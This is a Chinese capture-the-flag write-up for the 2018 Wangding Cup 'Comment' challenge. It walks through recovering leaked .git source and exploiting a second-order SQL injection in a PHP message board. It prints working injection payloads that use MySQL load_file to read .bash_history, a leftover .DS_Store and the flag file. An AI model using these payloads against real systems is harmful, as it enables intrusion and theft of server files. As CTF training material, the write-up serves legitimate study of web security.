[网鼎杯 2018]Comment
dirsearch扫目录发现.git泄露,用githack还原git文件。网上lijiejie的那个githack是不能做这道题的,出现如下的GitHack图标的才是真的。
git clone git://github.com/BugScanTeam/GitHack
直接下载下来的源代码文件是不完整的,进入到扫描目录下
git log --reflog
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
源代码:
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
最后构造出来的sql语句就是
$sql = "insert into comment
set category = '', content=user(),/*
content = '*/#',
bo_id = '$bo_id'";
可以看到我们已经查询出来当前用户是user,接下来用loadfile读取历史操作,', content=load_file('/home/www/.bash_history'),/*
把html.zip解压以后复制到/var/www,虽然最后删除了/var/www/html里的DS_Store,但是/tmp下的没有删。用hex编码:', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
结果用burpsuite的decoder查看,可以发现flag_8946e1ff1ee3e40f.php文件
真正的flag在var/www/html下,',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*